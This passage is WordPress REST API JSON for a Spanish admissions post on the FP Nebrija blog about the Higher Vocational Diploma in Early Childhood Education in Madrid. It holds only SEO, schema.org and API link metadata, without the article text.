Olivares\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/fpnebrija.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/077374ce6cf5a3ce8c7ab4ba4733f03fbf0a9341688ee68f2fa8c68bbac82a3b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/077374ce6cf5a3ce8c7ab4ba4733f03fbf0a9341688ee68f2fa8c68bbac82a3b?s=96&d=mm&r=g\",\"caption\":\"Maria Olivares\"},\"sameAs\":[\"https:\/\/www.fpnebrija.com\/\",\"https:\/\/www.facebook.com\/InstiNebrijaFP\",\"https:\/\/www.instagram.com\/instinebrijafp\/\",\"https:\/\/www.linkedin.com\/school\/instituto-nebrija-de-formacin-profesional\"],\"url\":\"https:\/\/fpnebrija.com\/blog\/author\/molivarenebrija-es\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Grado Superior en Educaci\u00f3n Infantil | Plazo de admisi\u00f3n abierto","description":"Reserva tu plaza para el Ciclo Formativo de Grado Superior en Educaci\u00f3n Infantil en Madrid. T\u00edtulo oficial, pr\u00e1cticas con prestigio y becas.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/","og_locale":"es_ES","og_type":"article","og_title":"Grado Superior en Educaci\u00f3n Infantil | Plazo de admisi\u00f3n abierto","og_description":"Reserva tu plaza para el Ciclo Formativo de Grado Superior en Educaci\u00f3n Infantil en Madrid. T\u00edtulo oficial, pr\u00e1cticas con prestigio y becas.","og_url":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/","og_site_name":"FP Nebrija","article_publisher":"https:\/\/www.facebook.com\/InstiNebrijaFP\/","article_author":"https:\/\/www.facebook.com\/InstiNebrijaFP","article_published_time":"2026-07-08T08:55:00+00:00","article_modified_time":"2026-08-24T13:46:48+00:00","og_image":[{"width":1376,"height":768,"url":"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb.jpg","type":"image\/jpeg"}],"author":"Maria Olivares","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Maria Olivares","Tiempo de lectura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#article","isPartOf":{"@id":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/"},"author":{"name":"Maria Olivares","@id":"https:\/\/fpnebrija.com\/blog\/#\/schema\/person\/dfd5188f279331f6b135646359f180d0"},"headline":"\u00a1Plazo de admisi\u00f3n abierto! Reserva tu plaza y convi\u00e9rtete en T\u00e9cnico Superior en Educaci\u00f3n Infantil con Nebrija","datePublished":"2026-07-08T08:55:00+00:00","dateModified":"2026-08-24T13:46:48+00:00","mainEntityOfPage":{"@id":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/"},"wordCount":710,"publisher":{"@id":"https:\/\/fpnebrija.com\/blog\/#organization"},"image":{"@id":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#primaryimage"},"thumbnailUrl":"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb.jpg","articleSection":["Acceso a Grado Superior","Grado Superior en Educaci\u00f3n Infantil"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/","url":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/","name":"Grado Superior en Educaci\u00f3n Infantil | Plazo de admisi\u00f3n abierto","isPartOf":{"@id":"https:\/\/fpnebrija.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#primaryimage"},"image":{"@id":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#primaryimage"},"thumbnailUrl":"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb.jpg","datePublished":"2026-07-08T08:55:00+00:00","dateModified":"2026-08-24T13:46:48+00:00","description":"Reserva tu plaza para el Ciclo Formativo de Grado Superior en Educaci\u00f3n Infantil en Madrid. T\u00edtulo oficial, pr\u00e1cticas con prestigio y becas.","breadcrumb":{"@id":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#primaryimage","url":"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb.jpg","contentUrl":"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb.jpg","width":1376,"height":768},{"@type":"BreadcrumbList","@id":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/fpnebrija.com\/blog\/"},{"@type":"ListItem","position":2,"name":"\u00a1Plazo de admisi\u00f3n abierto! Reserva tu plaza y convi\u00e9rtete en T\u00e9cnico Superior en Educaci\u00f3n Infantil con Nebrija"}]},{"@type":"WebSite","@id":"https:\/\/fpnebrija.com\/blog\/#website","url":"https:\/\/fpnebrija.com\/blog\/","name":"Blog FP Nebrija","description":"El blog del Instituto Nebrija de Formaci\u00f3n Profesional","publisher":{"@id":"https:\/\/fpnebrija.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/fpnebrija.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/fpnebrija.com\/blog\/#organization","name":"Instituto Nebrija de Formaci\u00f3n Profesional","url":"https:\/\/fpnebrija.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/fpnebrija.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2023\/02\/logo_cabecera_instituto_fp_412x81.png","contentUrl":"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2023\/02\/logo_cabecera_instituto_fp_412x81.png","width":412,"height":81,"caption":"Instituto Nebrija de Formaci\u00f3n Profesional"},"image":{"@id":"https:\/\/fpnebrija.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/InstiNebrijaFP\/","https:\/\/www.instagram.com\/instinebrijafp\/"]},{"@type":"Person","@id":"https:\/\/fpnebrija.com\/blog\/#\/schema\/person\/dfd5188f279331f6b135646359f180d0","name":"Maria Olivares","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/fpnebrija.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/077374ce6cf5a3ce8c7ab4ba4733f03fbf0a9341688ee68f2fa8c68bbac82a3b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/077374ce6cf5a3ce8c7ab4ba4733f03fbf0a9341688ee68f2fa8c68bbac82a3b?s=96&d=mm&r=g","caption":"Maria Olivares"},"sameAs":["https:\/\/www.fpnebrija.com\/","https:\/\/www.facebook.com\/InstiNebrijaFP","https:\/\/www.instagram.com\/instinebrijafp\/","https:\/\/www.linkedin.com\/school\/instituto-nebrija-de-formacin-profesional"],"url":"https:\/\/fpnebrija.com\/blog\/author\/molivarenebrija-es\/"}]}},"_links":{"self":[{"href":"https:\/\/fpnebrija.com\/blog\/wp-json\/wp\/v2\/posts\/2050","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fpnebrija.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fpnebrija.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fpnebrija.com\/blog\/wp-json\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/fpnebrija.com\/blog\/wp-json\/wp\/v2\/comments?post=2050"}],"version-history":[{"count":3,"href":"https:\/\/fpnebrija.com\/blog\/wp-json\/wp\/v2\/posts\/2050\/revisions"}],"predecessor-version":[{"id":2094,"href":"https:\/\/fpnebrija.com\/blog\/wp-json\/wp\/v2\/posts\/2050\/revisions\/2094"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fpnebrija.com\/blog\/wp-json\/wp\/v2\/media\/2051"}],"wp:attachment":[{"href":"https:\/\/fpnebrija.com\/blog\/wp-json\/wp\/v2\/media?parent=2050"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fpnebrija.com\/blog\/wp-json\/wp\/v2\/categories?post=2050"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fpnebrija.com\/blog\/wp-json\/wp\/v2\/tags?post=2050"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}